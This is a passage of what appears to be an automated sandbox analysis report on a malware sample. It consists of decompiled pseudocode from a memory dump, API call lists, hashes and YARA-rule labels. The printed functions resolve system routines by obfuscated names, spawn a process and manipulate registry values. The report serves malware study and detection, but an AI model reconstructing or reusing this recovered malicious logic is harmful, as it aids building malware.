				_v16 = _t43;
				_t44 = E0495A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x495c18c;
				}
				_t46 = E049518A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E0495A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x495d2a8; // 0x47a5a8
						_t16 = _t75 + 0x495eb08; // 0x530025
						 *0x495d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E0495A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x495c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E0495A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E0495A734(_v20);
						} else {
							_t66 =  *0x495d2a8; // 0x47a5a8
							_t31 = _t66 + 0x495ec28; // 0x73006d
							 *0x495d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E0495A734(_v12);
				}
				return _v24;
			}




























                                                          0x04956c40
                                                          0x04956c46
                                                          0x04956c4d
                                                          0x04956c53
                                                          0x04956c57
                                                          0x04956c5b
                                                          0x04956c5e
                                                          0x04956c63
                                                          0x04956c68
                                                          0x04956c6a
                                                          0x04956c6a
                                                          0x04956c73
                                                          0x04956c78
                                                          0x04956c7d
                                                          0x04956c83
                                                          0x04956c8d
                                                          0x04956c96
                                                          0x04956c9d
                                                          0x04956cb6
                                                          0x04956cbb
                                                          0x04956cc0
                                                          0x04956cc9
                                                          0x04956cd2
                                                          0x04956ce3
                                                          0x04956cec
                                                          0x04956cf0
                                                          0x04956cf4
                                                          0x04956cf9
                                                          0x04956cfe
                                                          0x04956d00
                                                          0x04956d00
                                                          0x04956d0a
                                                          0x04956d13
                                                          0x04956d1a
                                                          0x04956d32
                                                          0x04956d36
                                                          0x04956d73
                                                          0x04956d38
                                                          0x04956d3b
                                                          0x04956d43
                                                          0x04956d54
                                                          0x04956d60
                                                          0x04956d68
                                                          0x04956d6c
                                                          0x04956d6c
                                                          0x04956d36
                                                          0x04956d7b
                                                          0x04956d80
                                                          0x04956d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04956C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04956C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04956C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04956C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04956CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04956D0A
                                                          • lstrlen.KERNEL32(?), ref: 04956D13
                                                          • lstrlen.KERNEL32(?), ref: 04956D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04956D21
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 05fed423fcdffe5501cf0e624ed28682413b4d87e0ae50ce9c788efa133d21cc
                                                          • Instruction ID: af98483bf63ec2c824634f8327d375d9dfed80d4bdbbd47392641a0b0da399c5
                                                          • Opcode Fuzzy Hash: 05fed423fcdffe5501cf0e624ed28682413b4d87e0ae50ce9c788efa133d21cc
                                                          • Instruction Fuzzy Hash: 36412876D00219FBDF11AFA4CC48D9E7BB9EF44318F254161EE04A7220DB35EA50DB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04958EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E04958EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0495592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0495A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x495d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x495d2a8; // 0x47a5a8
					_t18 = _t47 + 0x495e3e6; // 0x73797325
					_t68 = E04953C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x495d2a8; // 0x47a5a8
						_t19 = _t50 + 0x495e747; // 0x4dd8cef
						_t20 = _t50 + 0x495e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0495A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0495A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x495d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0495A734(_t70);
				goto L12;
			}


















                                                          0x04958ea9
                                                          0x04958ea9
                                                          0x04958eb8
                                                          0x04958ebf
                                                          0x04958ec4
                                                          0x04958fd1
                                                          0x04958fd8
                                                          0x04958fd8
                                                          0x04958ed3
                                                          0x04958edb
                                                          0x04958ede
                                                          0x04958ee3
                                                          0x04958ef8
                                                          0x04958efe
                                                          0x04958eff
                                                          0x04958f02
                                                          0x04958f08
                                                          0x04958f0b
                                                          0x04958f10
                                                          0x04958f18
                                                          0x04958f24
                                                          0x04958f28
                                                          0x04958fb8
                                                          0x04958f2e
                                                          0x04958f2e
                                                          0x04958f33
                                                          0x04958f3a
                                                          0x04958f4e
                                                          0x04958f52
                                                          0x04958fa1
                                                          0x04958f54
                                                          0x04958f55
                                                          0x04958f5c
                                                          0x04958f75
                                                          0x04958f77
                                                          0x04958f7b
                                                          0x04958f82
                                                          0x04958f9c
                                                          0x04958f84
                                                          0x04958f8d
                                                          0x04958f92
                                                          0x04958f92
                                                          0x04958f82
                                                          0x04958fb0
                                                          0x04958fb0
                                                          0x04958f28
                                                          0x04958fbf
                                                          0x04958fc8
                                                          0x04958fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0495592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04958EBD,?,00000001,?,?,00000000,00000000), ref: 04955952
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04955974
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0495598A
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049559A0
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049559B6
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049559CC
                                                          • memset.NTDLL ref: 04958F0B
                                                            • Part of subcall function 04953C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04958F24,73797325), ref: 04953C59
                                                            • Part of subcall function 04953C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04953C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04DD8CEF,73797325), ref: 04958F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04958F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04958FB0
                                                            • Part of subcall function 0495A62D: GetProcAddress.KERNEL32(36776F57,0495A2D4), ref: 0495A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04958F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04958F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04958F96
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 7806b855be146b0bb14aabdb86ed68f344998622d4c6b31c7c529707839b598b
                                                          • Instruction ID: 83e182caecf7d820dd2a7b37fa20c2a233a6637e7fc682479e4333065fb25663
                                                          • Opcode Fuzzy Hash: 7806b855be146b0bb14aabdb86ed68f344998622d4c6b31c7c529707839b598b
                                                          • Instruction Fuzzy Hash: 80310EB2904208BFEB11EFA4DC88D9EBFBDEB48354F204575EA05A7120D775AE54CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04951BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E04951BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x495d2a8; // 0x47a5a8
				_t1 = _t9 + 0x495e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0495173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E0495A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E049564EF(_t34, _t41, _a8);
						E0495A734(_t41);
						_t42 = E04956467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0495A734(_t36);
							_t36 = _t42;
						}
						_t43 = E049517E5(_t36, _t33);
						if(_t43 != 0) {
							E0495A734(_t36);
							_t36 = _t43;
						}
					}
					E0495A734(_t28);
				}
				return _t36;
			}














                                                          0x04951bb6
                                                          0x04951bb9
                                                          0x04951bba
                                                          0x04951bc2
                                                          0x04951bc9
                                                          0x04951bd0
                                                          0x04951bd4
                                                          0x04951bda
                                                          0x04951be1
                                                          0x04951be6
                                                          0x04951bf8
                                                          0x04951bfc
                                                          0x04951c00
                                                          0x04951c06
                                                          0x04951c0b
                                                          0x04951c1b
                                                          0x04951c1d
                                                          0x04951c34
                                                          0x04951c38
                                                          0x04951c3b
                                                          0x04951c40
                                                          0x04951c40
                                                          0x04951c49
                                                          0x04951c4d
                                                          0x04951c50
                                                          0x04951c55
                                                          0x04951c55
                                                          0x04951c4d
                                                          0x04951c58
                                                          0x04951c58
                                                          0x04951c63

                                                          APIs
                                                            • Part of subcall function 0495173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04951BD0,253D7325,00000000,00000000,7742C740,?,?,049520C2,?), ref: 049517A4
                                                            • Part of subcall function 0495173D: sprintf.NTDLL ref: 049517C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                          • lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • strcpy.NTDLL ref: 04951C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 049564EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04951C1A,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04956506
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                            • Part of subcall function 04956467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04951C34,00000000,?,?,049520C2,?,04DD95B0), ref: 04956471
                                                            • Part of subcall function 04956467: _snprintf.NTDLL ref: 049564CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 1b5832e1b3d69bb2471d6add440ec7c409760aa3c059505552406e7ba261f45f
                                                          • Instruction ID: 3cfd6b1d4e504cd175d7eb0dc6de44325210f295531c4f113ce18930418b5e46
                                                          • Opcode Fuzzy Hash: 1b5832e1b3d69bb2471d6add440ec7c409760aa3c059505552406e7ba261f45f
                                                          • Instruction Fuzzy Hash: 6611E337D01224679B12FBB49C84C6E3AAD8EC56683364236FE0497120DF38EE0287A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 049568EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 049568FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04956911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956993
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: d7bad60988095f063a8a76546b884c0cae64da4f921501404009179e59a9d4b9
                                                          • Instruction ID: 8dcc4f6a5223467b4839195a7fee3cf55bac19fe95feb4e820510ee72b543af5
                                                          • Opcode Fuzzy Hash: d7bad60988095f063a8a76546b884c0cae64da4f921501404009179e59a9d4b9
                                                          • Instruction Fuzzy Hash: DC415E36900609AFDF01DFB8D854A9EBBBAEF89310F644425ED14EB220DA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0495592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0495A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x495d2a8; // 0x47a5a8
					_t1 = _t23 + 0x495e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x495d2a8; // 0x47a5a8
					_t2 = _t26 + 0x495e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0495A734(_t54);
					} else {
						_t30 =  *0x495d2a8; // 0x47a5a8
						_t5 = _t30 + 0x495e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x495d2a8; // 0x47a5a8
							_t7 = _t33 + 0x495e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x495d2a8; // 0x47a5a8
								_t9 = _t36 + 0x495e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x495d2a8; // 0x47a5a8
									_t11 = _t39 + 0x495e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04956604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x0495593c
                                                          0x04955940
                                                          0x04955a02
                                                          0x04955946
                                                          0x04955946
                                                          0x0495594b
                                                          0x0495595e
                                                          0x04955960
                                                          0x04955965
                                                          0x0495596d
                                                          0x04955974
                                                          0x04955976
                                                          0x0495597b
                                                          0x049559fa
                                                          0x049559fb
                                                          0x0495597d
                                                          0x0495597d
                                                          0x04955982
                                                          0x0495598a
                                                          0x0495598c
                                                          0x04955991
                                                          0x00000000
                                                          0x04955993
                                                          0x04955993
                                                          0x04955998
                                                          0x049559a0
                                                          0x049559a2
                                                          0x049559a7
                                                          0x00000000
                                                          0x049559a9
                                                          0x049559a9
                                                          0x049559ae
                                                          0x049559b6
                                                          0x049559b8
                                                          0x049559bd
                                                          0x00000000
                                                          0x049559bf
                                                          0x049559bf
                                                          0x049559c4
                                                          0x049559cc
                                                          0x049559ce
                                                          0x049559d3
                                                          0x00000000
                                                          0x049559d5
                                                          0x049559db
                                                          0x049559e0
                                                          0x049559e7
                                                          0x049559ec
                                                          0x049559f1
                                                          0x00000000
                                                          0x049559f3
                                                          0x049559f6
                                                          0x049559f6
                                                          0x049559f1
                                                          0x049559d3
                                                          0x049559bd
                                                          0x049559a7
                                                          0x04955991
                                                          0x0495597b
                                                          0x04955a10

                                                          APIs
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04958EBD,?,00000001,?,?,00000000,00000000), ref: 04955952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04955974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0495598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049559A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049559B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049559CC
                                                            • Part of subcall function 04956604: memset.NTDLL ref: 04956683
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: c9471515214aa249109267fd2ab57b98a9dce64b9b55e834e0a914c902f98439
                                                          • Instruction ID: 37fc8fade8e1b3e07c956dee4af365aa6ffbcc30f56f86bc41cbc75dd15c78c2
                                                          • Opcode Fuzzy Hash: c9471515214aa249109267fd2ab57b98a9dce64b9b55e834e0a914c902f98439
                                                          • Instruction Fuzzy Hash: B32182B0500706AFEB11DF69D854D56BBECEF443147218236E909C7621E778FA05CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E0495853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x495d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04959070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04956E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0495A734(_a8);
						goto L29;
					}
					_t64 =  *0x495d278; // 0x4dd9a98
					_t16 = _t64 + 0xc; // 0x4dd9b66
					_t65 = E04959070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0495c0
						if(E049522F1(_t97,  *_t33, _t91, _a8,  *0x495d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x495d2a8; // 0x47a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x495ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x495e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04956C38(_t69,  *0x495d334,  *0x495d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x495d2a8; // 0x47a5a8
									_t44 = _t71 + 0x495e846; // 0x74666f53
									_t73 = E04959070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0495c0
										E04955D7D( *_t47, _t91, _a8,  *0x495d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0495c0
										E04955D7D( *_t49, _t91, _t99,  *0x495d330, _a16);
										E0495A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0495c0
									E04955D7D( *_t40, _t91, _a8,  *0x495d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0495c0
									E04955D7D( *_t43, _t91, _a8,  *0x495d330, _a16);
								}
								if( *_t101 != 0) {
									E0495A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0495c0
					_t81 = E04958BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0495c0
							E049522F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0495A734(_t100);
						_t98 = _a16;
					}
					E0495A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0495A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x495d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x0495853f
                                                          0x04958548
                                                          0x0495854f
                                                          0x04958554
                                                          0x049585c1
                                                          0x049585c7
                                                          0x049585cc
                                                          0x049585d3
                                                          0x049585d8
                                                          0x049585dd
                                                          0x04958748
                                                          0x0495874f
                                                          0x0495874f
                                                          0x04958754
                                                          0x04958756
                                                          0x04958756
                                                          0x0495875f
                                                          0x0495875f
                                                          0x049585e3
                                                          0x049585ef
                                                          0x0495873e
                                                          0x04958741
                                                          0x00000000
                                                          0x04958741
                                                          0x049585f5
                                                          0x049585fa
                                                          0x049585fd
                                                          0x04958602
                                                          0x04958607
                                                          0x04958650
                                                          0x04958650
                                                          0x04958663
                                                          0x0495866d
                                                          0x04958673
                                                          0x0495867a
                                                          0x04958684
                                                          0x04958684
                                                          0x0495867c
                                                          0x0495867c
                                                          0x0495867c
                                                          0x0495867c
                                                          0x049586a6
                                                          0x049586ae
                                                          0x049586dc
                                                          0x049586e1
                                                          0x049586e8
                                                          0x049586ed
                                                          0x049586f1
                                                          0x04958723
                                                          0x049586f3
                                                          0x04958700
                                                          0x04958703
                                                          0x04958713
                                                          0x04958716
                                                          0x0495871c
                                                          0x0495871c
                                                          0x049586b0
                                                          0x049586bd
                                                          0x049586c0
                                                          0x049586d2
                                                          0x049586d5
                                                          0x049586d5
                                                          0x0495872d
                                                          0x04958739
                                                          0x0495872f
                                                          0x04958732
                                                          0x04958732
                                                          0x0495872d
                                                          0x049586a6
                                                          0x00000000
                                                          0x0495866d
                                                          0x04958616
                                                          0x04958619
                                                          0x04958620
                                                          0x04958626
                                                          0x04958629
                                                          0x0495862b
                                                          0x04958637
                                                          0x0495863a
                                                          0x0495863a
                                                          0x04958640
                                                          0x04958645
                                                          0x04958645
                                                          0x0495864b
                                                          0x00000000
                                                          0x0495864b
                                                          0x04958559
                                                          0x00000000
                                                          0x04958580
                                                          0x04958580
                                                          0x0495858c
                                                          0x0495859f
                                                          0x049585a5
                                                          0x049585ad
                                                          0x00000000
                                                          0x049585ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(04953741,0000005F,00000000,00000000,00000104), ref: 04958572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0495859F
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                            • Part of subcall function 04955D7D: lstrlenW.KERNEL32(?,?,?,04958708,3D0495C0,80000002,04953741,0495A513,74666F53,4D4C4B48,0495A513,?,3D0495C0,80000002,04953741,?), ref: 04955DA2
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 049585C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
